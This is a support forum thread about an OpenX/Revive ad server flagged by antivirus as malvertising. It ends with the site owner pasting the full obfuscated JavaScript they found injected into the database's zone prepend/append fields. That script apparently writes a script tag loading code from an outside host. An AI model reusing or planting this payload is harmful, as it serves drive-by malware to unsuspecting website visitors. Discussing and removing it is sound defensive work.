Jump to content

Recommended Posts

Posted

Hello,

 

My site using openx for ad server and detect by norton antivirus as "malvertisement website redirect", upgrade to revive ad server not solve this problem, and i not found malicious code on a web page. Anyone have same problem?

 

Thanks.

Posted

I think it has to do with Iframe invocation code (eventhou i installed my revive software on https://) i get this error too. I was hoping you guys could use a slider type of script for this instead of an iframe reload. Would require less server resources and the banner transitions would be smooth.

Posted

I have installed Revive ad server to ads.gameqq.net, and post code to page www.gameqq.net, whether the domain ads that cause this problem?

 

My Norton Antivirus 2011 has detect 3 zone banner with invocation code javascript tag. At this time, I disable the "malvertisement" signature from Norton in my computer for unblocking the banner.

Posted

Someone hacked your OpenX. You can't just expect that upgrading to Revive Adserver could magically clean up the "infection", unless you wiped out OpenX completely and did a fresh install of Revive. You have to carefully check and clean up the filesystem and database to make suer the malware is gone.

Posted

Finally, I found mallicious code in my Database on table "pre_zone", in column "prepend" and "append". After deleted that code, My Norton Antivirus not blocked Banner again. The code like this:

<script>try{$a=~[];$a={___:++$a,$$$$![]+"")[$a],__$:++$a,$_$_![]+"")[$a],_$_:++$a,$_$${}+"")[$a],$$_$$a[$a]+"")[$a],_$$:++$a,$$$_!""+"")[$a],$__:++$a,$_$:++$a,$$__{}+"")[$a],$$_:++$a,$$$:++$a,$___:++$a,$__$:++$a};$a.$_=($a.$_=$a+"")[$a.$_$]+($a._$=$a.$_[$a.__$])+($a.$$=($a.$+"")[$a.__$])+((!$a)+"")[$a._$$]+($a.__=$a.$_[$a.$$_])+($a.$=(!""+"")[$a.__$])+($a._=(!""+"")[$a._$_])+$a.$_[$a.$_$]+$a.__+$a._$+$a.$;$a.$$=$a.$+(!""+"")[$a._$$]+$a.__+$a._+$a.$+$a.$$;$a.$=($a.___)[$a.$_][$a.$_];$a.$($a.$($a.$$+"\""+$a.$$_$+"="+$a.$$_$+$a._$+$a.$$__+$a._+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";"+$a._+$a.$_$_+"=\\"+$a.__$+$a.$_$+$a.$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a.$$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+$a.__+$a._$+"\\"+$a.__$+$a.$$_+$a._$_+"."+$a._+"\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.___+$a.__$+"\\"+$a.__$+$a.$__+$a.$$$+$a.$$$_+"\\"+$a.__$+$a.$_$+$a.$$_+$a.__+";\\"+$a.__$+$a.$_$+$a.__$+$a.$$$$+"("+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"==="+$a._+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a.$$$_+$a.$$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.$$_$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('_"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"=')==-"+$a.__$+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a._$_+$a.$$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+$a.$$_$+$a._$+"\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a.$$_+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.$__+$a.___+"')>"+$a.___+"\\"+$a.$__+$a.___+"&&\\"+$a.$__+$a.___+$a._+$a.$_$_+".\\"+$a.__$+$a.$$_+$a._$$+$a.$$$_+$a.$_$_+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"\\"+$a.__$+$a.$_$+$a.___+"('\\"+$a.__$+$a.__$+$a.$_$+"\\"+$a.__$+$a._$_+$a._$$+"\\"+$a.__$+$a.__$+$a.__$+"\\"+$a.__$+$a.___+$a.$_$+"\\"+$a.$__+$a.___+"')>"+$a.___+")\\"+$a.$__+$a.___+"{"+$a.$$_$+"._\\"+$a.__$+$a.$$$+$a._$_+"\\"+$a.__$+$a.$$$+$a.___+"="+$a.__$+";"+$a.$$_$+"."+$a.$$__+$a._$+$a._$+"\\"+$a.__$+$a.$_$+$a._$$+"\\"+$a.__$+$a.$_$+$a.__$+$a.$$$_+"='__"+$a._+$a.__+"\\"+$a.__$+$a.$_$+$a.$_$+$a._+$a.$$_$+"="+$a.__$+";\\"+$a.$__+$a.___+$a.$$$_+"\\"+$a.__$+$a.$$$+$a.___+"\\"+$a.__$+$a.$$_+$a.___+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$$_+"\\"+$a.__$+$a.$$_+$a._$$+"=\\"+$a.__$+$a._$_+$a.$$$+$a.$$$_+$a.$$_$+",\\"+$a.$__+$a.___+$a.___+$a.__$+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.__$+$a._$_+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.$__+$a.___+$a._$_+$a.___+$a._$_+$a.___+"\\"+$a.$__+$a.___+$a.___+$a.___+":"+$a.___+$a.___+":"+$a.___+$a.___+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a._$_+$a.$_$+"\\"+$a.__$+$a._$_+$a.$__+"\\"+$a.__$+$a.___+$a._$$+";\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a.___+$a.$_$_+$a.__+"\\"+$a.__$+$a.$_$+$a.___+"=/';"+$a.$$_$+".\\"+$a.__$+$a.$$_+$a.$$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+$a.__+$a.$$$_+(![]+"")[$a._$_]+"\\"+$a.__$+$a.$_$+$a.$$_+"(\\\"<\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\\"+\\\"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$_+$a.___+$a.__+"\\"+$a.$__+$a.___+"\\"+$a.__$+$a.$$_+$a._$$+"\\"+$a.__$+$a.$$_+$a._$_+$a.$$__+"='\\"+$a.__$+$a.$_$+$a.___+$a.__+$a.__+"\\"+$a.__$+$a.$$_+$a.___+"://"+$a.$_$$+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$_$+$a.$$_+"\\"+$a.__$+$a.$$_+$a._$$+"."+$a.$_$$+"\\"+$a.__$+$a.$_$+$a.__$+"\\"+$a.__$+$a.$$$+$a._$_+"/"+$a.$$__+$a.$___+$a.$__+$a.$___+$a.__$+$a.$$$$+$a.$_$+$a.___+".\\"+$a.__$+$a.$_$+$a._$_+"\\"+$a.__$+$a.$$_+$a._$$+"?"+$a.$$__+"\\"+$a.__$+$a.$$_+$a.___+"="+$a.$_$_+$a.$$_$+"\\"+$a.__$+$a.$$_+$a._$$+".\\"+$a.__$+$a.$__+$a.$$$+$a.$_$_+"\\"+$a.__$+$a.$_$+$a.$_$+$a.$$$_+"\\"+$a.__$+$a.$$_+$a.__$+"\\"+$a.__$+$a.$$_+$a.__$+".\\"+$a.__$+$a.$_$+$a.$$_+$a.$$$_+$a.__+"'></\\"+$a.__$+$a.$$_+$a._$$+$a.$$__+"\\"+$a.__$+$a.$$_+$a._$_+"\\"+$a.__$+$a.$_$+$a.__$+"\\\"+\\\"\\"+$a.__$+$a.$$_+$a.___+$a.__+">\\\");}"+"\"")())();}catch(e){}</script><!--vcwrz-->

Many Thanks to you all for the clue and advise.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...